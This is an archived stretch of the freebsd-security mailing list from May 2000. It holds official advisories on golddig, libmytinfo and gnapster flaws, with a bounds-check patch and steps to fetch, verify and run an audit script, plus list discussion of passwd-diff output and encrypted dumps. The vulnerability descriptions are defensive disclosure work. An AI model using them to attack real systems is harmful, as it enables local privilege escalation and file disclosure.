CPU1. Any other idea on what I can check or change? > > thanks a lot for your time, > Nazila M. > > > >From: Fox Anderson > >To: "N. N.M" > >Subject: Re: Maybe off topic > >Date: Wed, 10 May 2000 16:25:19 +0300 > > > >ΧΤ , 09 ΝΑΚ 2000, χΩ ΞΑΠΙΣΑΜΙ: > > > Hi everybody, > > > > > > Sorry in advance if my question sound off. I installed FreeBSD 3.2 on a > > > dual-processor PC. How can I get sure that OS detects that? (it seems > >that > > > it doesn't). Do I need any extra configuration (more than default > > > configuration) to force FreeBSD 3.2 to detect it? > > > > > > All comments are appreciated. > > > Thanks a lot, > > > Nazila M. > > > ________________________________________________________________________ > > > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > >You have to compile your kernel with SMP support. Then reboot and run top. > >You'll see CPU0 and CPU1 in STATE column. > > good luck. > > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O _-\<,_ Why drive when you can bike? (_)/ (_) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 12:15:21 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 385BC37BEA3; Tue, 9 May 2000 12:15:12 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:16.golddig Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000509191512.385BC37BEA3@hub.freebsd.org> Date: Tue, 9 May 2000 12:15:12 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:16 Security Advisory FreeBSD, Inc. Topic: golddig port allows users to overwrite local files Category: ports Module: golddig Announced: 2000-05-09 Credits: Discovered during internal ports collection auditing. Affects: Ports collection. Corrected: 2000-04-30 Vendor status: Email bounced. FreeBSD only: NO I. Background Golddig is an X11 game provided as part of the FreeBSD ports collection. II. Problem Description The golddig port erroneously installs a level-creation utility setuid root, which allows users to overwrite the contents of arbitrary local files. It is not believed that any elevation of privileges is possible with this vulnerability because the contents of the file are a textual representation of a golddig game level which is highly constrained. The golddig port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact An unprivileged local user can overwrite the contents of any file, although they are restricted in the possible contents of the new file. If you have not chosen to install the golddig port/package, then your system is not vulnerable to this problem. IV. Workaround One of the following: 1) Deinstall the golddig port/package, if you you have installed it. 2) Remove the setuid bit from /usr/local/bin/makelev. This will mean unprivileged users cannot create or modify golddig levels except in their own directories. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the golddig port. 2) Reinstall a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/games/golddig-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/games/golddig-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/games/golddig-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/games/golddig-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/games/golddig-2.0.tgz Note: it may be several days before the updated packages are available. 3) download a new port skeleton for the golddig port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBORhjV1UuHi5z0oilAQHa4AP8D5QZo+zNieNemPMfMW77JIxsHtCHCg+M MEG6CkJ6QOZlwJ8Mav1ExMyQywWncccgkazBFyK2KG5rAqpxX4KMZ+C3zfysTraS cHVCVBw73yx0t53/FnvoR3yqtI+GdmhPaw9X3icCtp9st3hiSMF759yPqOUKBbIu JFgdfAuXaqs= =Pxca -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 12:21: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 5712437BFB7; Tue, 9 May 2000 12:20:49 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:17.libmytinfo Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000509192049.5712437BFB7@hub.freebsd.org> Date: Tue, 9 May 2000 12:20:49 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:17 Security Advisory FreeBSD, Inc. Topic: Buffer overflow in libmytinfo may yield increased privileges with third-party software. Category: core Module: libmytinfo Announced: 2000-05-09 Affects: FreeBSD 3.x before the correction date. Corrected: 2000-04-25 FreeBSD only: Yes Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libmytinfo.patch I. Background libmytinfo is part of ncurses, a text-mode display library. II. Problem Description libmytinfo allows users to specify an alternate termcap file or entry via the TERMCAP environment variable, however this is not handled securely and contains a overflowable buffer inside the library. This is a security vulnerability for binaries which are linked against libmytinfo and which are setuid or setgid (i.e. run with elevated privileges). It may also be a vulnerability in other more obscure situations where a user can exert control over the environment with which an ncurses binary is run by another user. FreeBSD 3.x and earlier versions use a very old, customized version of ncurses which is difficult to update without breaking backwards-compatibility. The update was made for FreeBSD 4.0, but it is unlikely that 3.x will be updated. However, the ncurses source is currently being audited for further vulnerabilities. III. Impact Certain setuid/setgid third-party software (including FreeBSD ports/packages) may be vulnerable to a local exploit yielding privileged resources, such as network sockets, privileged filesystem access, or outright privileged shell access (including root access). No program in the FreeBSD base system is believed to be vulnerable to the bug. FreeBSD 4.0 and above are NOT vulnerable to this problem. IV. Workaround Remove any setuid or setgid binary which is linked against libmytinfo (including statically linked), or remove set[ug]id privileges from the file as appropriate. The following instructions will identify the binaries installed on the system which are candidates for removal or removal of file permissions. Since there may be other as yet undiscovered vulnerabilities in libmytinfo it may be wise to perform this audit regardless of whether or not you upgrade your system as described in section V below. In particular, see the note regarding static linking in section V. Of course, it is possible that some of the identified files may be required for the correct operation of your local system, in which case there is no clear workaround except for limiting the set of users who may run the binaries, by an appropriate use of user groups and removing the "o+x" file permission bit. 1) Download the 'libfind.sh' script from ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libfind.sh e.g. with the fetch(1) command: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:17/libfind.sh Receiving libfind.sh (460 bytes): 100% 460 bytes transferred in 0.0 seconds (394.69 Kbytes/s) # 2) Verify the md5 checksum and compare to the value below: # /sbin/md5 libfind.sh MD5 (libfind.sh) = 59dceaa76d6440c58471354a10a8fb0b 3) Run the libfind script against your system: # sh libfind.sh / This will scan your entire system for setuid or setgid binaries which are linked against libmytinfo. Each returned binary should be examined (e.g. with 'ls -l' and/or other tools) to determine what security risk it poses to your local environment, e.g. whether it can be run by arbitrary local users who may be able to exploit it to gain privileges. 4) Remove the binaries, or reduce their file permissions, as appropriate. V. Solution Upgrade your FreeBSD 3.x system to 3.4-STABLE after the correction date, or patch your present system source code and rebuild. Then run the libfind script as instructed in section IV and identify any statically-linked binaries (those reported as "STATIC" by the libfind script). These should either be removed, recompiled, or have privileges restricted to secure them against this vulnerability (since statically-linked binaries will not be affected by recompiling the shared libmytinfo library). To patch your present system: save the patch below into a file, and execute the following commands as root: cd /usr/src/lib/libmytinfo patch < /path/to/patch/file make all make install Patches for 3.x systems before the resolution date: Index: findterm.c =================================================================== RCS file: /usr/cvs/src/lib/libmytinfo/Attic/findterm.c,v retrieving revision 1.3 diff -u -r1.3 findterm.c --- findterm.c 1997/08/13 01:21:36 1.3 +++ findterm.c 2000/04/25 16:58:19 @@ -242,7 +242,7 @@ } else { s = path->file; d = buf; - while(*s != '\0' && *s != ':') + while(*s != '\0' && *s != ':' && d - buf < MAX_LINE - 1) *d++ = *s++; *d = '\0'; if (_tmatch(buf, name)) { @@ -259,7 +259,7 @@ } else { s = path->file; d = buf; - while(*s != '\0' && *s != ',') + while(*s != '\0' && *s != ',' && d - buf < MAX_LINE - 1) *d++ = *s++; *d = '\0'; if (_tmatch(buf, name)) { -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBORc3NFUuHi5z0oilAQGcaAP6Ar4+mNTHR/qXUJ+MFIVy+AQHFDwpYq5f KgBpCRzgKVZs/zfsQ+LwC1vCHzusftTK0lEd//2pfGZHt3ln0eD1s6qt+Q6+ZJBE MYYiXvqoBL1ob2Ahts6uEUs/vbMb4bCbEmMCn4ad2iU+neKH9a81Lk3frIaJjAVK 8/6vW7wH9W4= =NDsR -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 12:24:18 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 5EEE137BEB2; Tue, 9 May 2000 12:24:03 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:18.gnapster Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000509192403.5EEE137BEB2@hub.freebsd.org> Date: Tue, 9 May 2000 12:24:03 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:18 Security Advisory FreeBSD, Inc. Topic: gnapster port allows remote users to view local files Category: ports Module: gnapster Announced: 2000-05-09 Credits: Fixed by vendor. Affects: Ports collection. Corrected: 2000-04-29 Vendor status: Updated version released. FreeBSD only: NO I. Background Gnapster is a client for the Napster file-sharing network. II. Problem Description The gnapster port (version 1.3.8 and earlier) contains a vulnerability which allows remote gnapster users to view any file on the local system which is accessible to the user running gnapster. Gnapster does not run with elevated privileges, so it is only the user's regular filesystem access permissions which are involved. The gnapster port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote users can view files accessible to the user running the gnapster client. If you have not chosen to install the gnapster port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the gnapster port/package, if you you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the gnapster port. 2) Reinstall a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/gnapster-1.3.9.tgz Note: it may be several days before the updated packages are available. 3) download a new port skeleton for the gnapster port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBORhlmVUuHi5z0oilAQGytwQApAKwVXvt2Aw6JXMHetWyRLns2wPWT6l3 eIdlkGSesqJlxeeR22wfxWlqcFo3U2D8hlIcWCPCB5y7ejJ3MyeMU895OjJGZ5ii wNe5OabbNwnWjEQmMH8AB4c/zy8GRI9xTOMW/KAcoH5TGhmzJ+29KIYYFwJXlek7 Ywc5E9+Q0pw= =Yr2H -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 13:53:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id C2D0037BEE1 for ; Tue, 9 May 2000 13:53:38 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e49KvFJ82966 for ; Tue, 9 May 2000 13:57:15 -0700 (PDT) Date: Tue, 9 May 2000 13:57:15 -0700 (PDT) From: "f.johan.beisser" To: security@freebsd.org Subject: oosp? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org in the latest set of warnings for freebsd 3.x, a script is referenced (libfind.sh) that isn't existing on the ftp site. anyone have it? thanks, jan +-----/ f. johan beisser /------------------------------+ email: jan[at]caustic.org web: http://www.caustic.org/~jan "knowledge is power. power corrupts. study hard, be evil." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 13:59:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from winconx.com (ns1.winconx.net [208.60.80.2]) by hub.freebsd.org (Postfix) with SMTP id D7A3737BF91 for ; Tue, 9 May 2000 13:59:51 -0700 (PDT) (envelope-from travis@winconx.com) Received: (qmail 8305 invoked from network); 9 May 2000 21:03:01 -0000 Received: from dhcp01.winconx.net (HELO travis) (208.60.80.32) by ns1.winconx.net with SMTP; 9 May 2000 21:03:01 -0000 Message-ID: <028301bfb9f9$7ef146c0$20503cd0@travis> From: "Travis Leuthauser" To: "f.johan.beisser" , References: Subject: Re: oosp? Date: Tue, 9 May 2000 15:59:41 -0500 Organization: DDS Group of Companies MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The script is actually at ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh Travis Leuthauser Network Administrator DDS Group ----- Original Message ----- From: "f.johan.beisser" To: Sent: Tuesday, May 09, 2000 3:57 PM Subject: oosp? > > in the latest set of warnings for freebsd 3.x, a script is referenced > (libfind.sh) that isn't existing on the ftp site. > > anyone have it? > > thanks, > jan > > +-----/ f. johan beisser /------------------------------+ > email: jan[at]caustic.org web: http://www.caustic.org/~jan > "knowledge is power. power corrupts. study hard, be evil." > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 14: 4:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id 5C6D637BFE2 for ; Tue, 9 May 2000 14:04:07 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e49L7dh83042; Tue, 9 May 2000 14:07:40 -0700 (PDT) Date: Tue, 9 May 2000 14:07:39 -0700 (PDT) From: "f.johan.beisser" To: Travis Leuthauser Cc: security@freebsd.org Subject: Re: oosp? In-Reply-To: <028301bfb9f9$7ef146c0$20503cd0@travis> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org yeah, i just cought that. oosp again. thanks :) On Tue, 9 May 2000, Travis Leuthauser wrote: > The script is actually at > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh > > Travis Leuthauser > Network Administrator > DDS Group > +-----/ f. johan beisser /------------------------------+ email: jan[at]caustic.org web: http://www.caustic.org/~jan "knowledge is power. power corrupts. study hard, be evil." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 15:19:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21F1037BEA3; Tue, 9 May 2000 15:19:30 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA45450; Tue, 9 May 2000 15:19:29 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 9 May 2000 15:19:23 -0700 (PDT) From: Kris Kennaway To: Travis Leuthauser Cc: "f.johan.beisser" , security@freebsd.org Subject: Re: oosp? In-Reply-To: <028301bfb9f9$7ef146c0$20503cd0@travis> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- On Tue, 9 May 2000, Travis Leuthauser wrote: > The script is actually at > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/libfind.sh Sorry about this, folks - the FTP site has been updated with a link pointing to the correct location. Kris - ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Comment: Made with pgp4pine 1.74 Charset: noconv iQCVAwUBORiO8VUuHi5z0oilAQFiBgQAijZJn+o/XSiYtJLuywmQRHoNwjElwBk2 8XisqdhagdzvfQRNIBFx5YDYDEJc1YOFy0g0S7QGKUk1/GuGxcFKBgGO39RGJiWs KuQZfT8/zyX7gS02y1XZahNAHkSTWxQFVDsqlkJ3ZmKWKYFbIzy2CGCZy2zHzK9A 9LEGTTs4OU0= =hCKa -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 18:55:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8D47037B616 for ; Tue, 9 May 2000 18:55:26 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id VAA29940; Tue, 9 May 2000 21:55:16 -0400 (EDT) (envelope-from cjc) Date: Tue, 9 May 2000 21:55:16 -0400 From: "Crist J. Clark" To: Peter van Dijk Cc: security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <20000509150609.L42267@vuurwerk.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000509150609.L42267@vuurwerk.nl>; from petervd@vuurwerk.nl on Tue, May 09, 2000 at 03:06:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote: > [snip] > > Backup passwd and group files: > envy.vuurwerk.nl passwd diffs: > 3c3 > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > --- > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > [snip] > > This line needed some thinking from me until I realized that it was trying > to tell me the rootpassword changed (which I already knew, ofcourse). Could > this be made more obvious, something like (password1) in the top one and > (password2) in the bottom one? Can you think of a clean way to do it? You do not want to show 'password1' and 'password2' if the password _didn't_ change, right? Now, for the case above, it is easy enough, but you need to handle the possibity of multiple changes. Sure, it's quite possible to do with awk(1) or perl(1), but IMHO, I'll take the simple solution in 200.backup-passwd over something that would need to be fairly complicated. Personally, I don't think most people stare too long at the above line before figuring it out, and once they do, they never have trouble spotting it again. Then again... If someone sees a quick way to do it... -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 0:53: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from pr.infosec.ru (pr.infosec.ru [194.135.141.98]) by hub.freebsd.org (Postfix) with ESMTP id 4F32837B545 for ; Wed, 10 May 2000 00:52:59 -0700 (PDT) (envelope-from blaze@infosec.ru) Received: from blaze (200.0.0.51 [200.0.0.51]) by pr.infosec.ru with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id K2Q3CTJR; Wed, 10 May 2000 11:53:05 +0400 Date: Wed, 10 May 2000 11:55:10 +0400 (MSD) From: Andrey Sverdlichenko X-Sender: blaze@blaze To: security@FreeBSD.ORG Subject: Re: Cryptographic dump(8) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 8 May 2000, Narvi wrote: > Another thing to consider (and I am yet to see it in this discussion): > > Say a block relatively in the beginning of the dump gets read off > the tape corrupted. Any encryption scheme in which such means that > the entire dump is worthless is less than satisfactory in most > environments. Correct me if i'm wrong, but error in cipher block this will break just a corrupted block in CFB mode, this and next blocks in OFB and CBC modes. The rest of dump will be ok and, because of dump block is usually much bigger than cipher block, error will not spread at all, even if entire dump encrypted on single key and IV. -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GIT d- s+:- a-- C++ UB++$ P+ L+ E- W+ N++ o? K? w-- O- M- V? PS+ PE+ Y+ PGP+ t 5+ X R tv b++(+++) DI? D++ G e++ h r- y ------END GEEK CODE BLOCK------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 5: 1: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id F24B437B613 for ; Wed, 10 May 2000 05:00:57 -0700 (PDT) (envelope-from petervd@vuurwerk.nl) Received: (qmail 15070 invoked from network); 10 May 2000 12:00:53 -0000 Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 10 May 2000 12:00:53 -0000 Received: (qmail 46331 invoked by uid 11109); 10 May 2000 12:00:53 -0000 Mail-Followup-To: security@FreeBSD.ORG Date: Wed, 10 May 2000 14:00:53 +0200 From: Peter van Dijk To: security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510140053.G46065@vuurwerk.nl> References: <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com>; from cjc@cc942873-a.ewndsr1.nj.home.com on Tue, May 09, 2000 at 09:55:16PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote: > On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote: > > [snip] > > > > Backup passwd and group files: > > envy.vuurwerk.nl passwd diffs: > > 3c3 > > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > --- > > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > [snip] > > > > This line needed some thinking from me until I realized that it was trying > > to tell me the rootpassword changed (which I already knew, ofcourse). Could > > this be made more obvious, something like (password1) in the top one and > > (password2) in the bottom one? > > Can you think of a clean way to do it? You do not want to show > 'password1' and 'password2' if the password _didn't_ change, right? Correct. > Now, for the case above, it is easy enough, but you need to handle > the possibity of multiple changes. > > Sure, it's quite possible to do with awk(1) or perl(1), but IMHO, I'll > take the simple solution in 200.backup-passwd over something that > would need to be fairly complicated. Personally, I don't think most > people stare too long at the above line before figuring it out, and > once they do, they never have trouble spotting it again. > > Then again... If someone sees a quick way to do it... I think you are right. I will recognize what it means next time, and a simple shell-scripting solution doesn't seem to be anywhere near. Thank you for your time :) Greetz, Peter. -- Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love] | `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl | a scritp kiddie clicking a mouse button.' | www.dataloss.net | - hackernews.com, commenting on the apache.org deface To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 5:53: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from infidel.boolean.net (router.boolean.net [198.144.206.49]) by hub.freebsd.org (Postfix) with ESMTP id 62F1837B711 for ; Wed, 10 May 2000 05:52:56 -0700 (PDT) (envelope-from Kurt@OpenLDAP.org) Received: from gypsy (gypsy.boolean.net [198.144.202.243]) by infidel.boolean.net (8.9.3/8.9.3) with SMTP id MAA58078; Wed, 10 May 2000 12:52:47 GMT (envelope-from Kurt@OpenLDAP.org) Message-Id: <3.0.5.32.20000510055246.009b9100@infidel.boolean.net> X-Sender: guru@infidel.boolean.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Wed, 10 May 2000 05:52:46 -0700 To: Peter van Dijk From: "Kurt D. Zeilenga" Subject: Re: envy.vuurwerk.nl daily run output Cc: security@FreeBSD.ORG In-Reply-To: <20000510140053.G46065@vuurwerk.nl> References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:00 PM 5/10/00 +0200, Peter van Dijk wrote: >On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote: >> On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote: >> > [snip] >> > >> > Backup passwd and group files: >> > envy.vuurwerk.nl passwd diffs: >> > 3c3 >> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash >> > --- >> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash >> > [snip] Actually, the use of "password" could mask a change... consider < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash --- > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh The admin would likely assume only the shell has changed even though password may have changed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 5:55:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 8C7A437B5C5 for ; Wed, 10 May 2000 05:55:15 -0700 (PDT) (envelope-from petervd@vuurwerk.nl) Received: (qmail 15365 invoked from network); 10 May 2000 12:55:08 -0000 Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 10 May 2000 12:55:08 -0000 Received: (qmail 47366 invoked by uid 11109); 10 May 2000 12:55:08 -0000 Mail-Followup-To: security@FreeBSD.ORG Date: Wed, 10 May 2000 14:55:08 +0200 From: Peter van Dijk To: security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510145508.M46065@vuurwerk.nl> References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000510140053.G46065@vuurwerk.nl> <3.0.5.32.20000510055246.009b9100@infidel.boolean.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <3.0.5.32.20000510055246.009b9100@infidel.boolean.net>; from Kurt@OpenLDAP.org on Wed, May 10, 2000 at 05:52:46AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 10, 2000 at 05:52:46AM -0700, Kurt D. Zeilenga wrote: > At 02:00 PM 5/10/00 +0200, Peter van Dijk wrote: > >On Tue, May 09, 2000 at 09:55:16PM -0400, Crist J. Clark wrote: > >> On Tue, May 09, 2000 at 03:06:09PM +0200, Peter van Dijk wrote: > >> > [snip] > >> > > >> > Backup passwd and group files: > >> > envy.vuurwerk.nl passwd diffs: > >> > 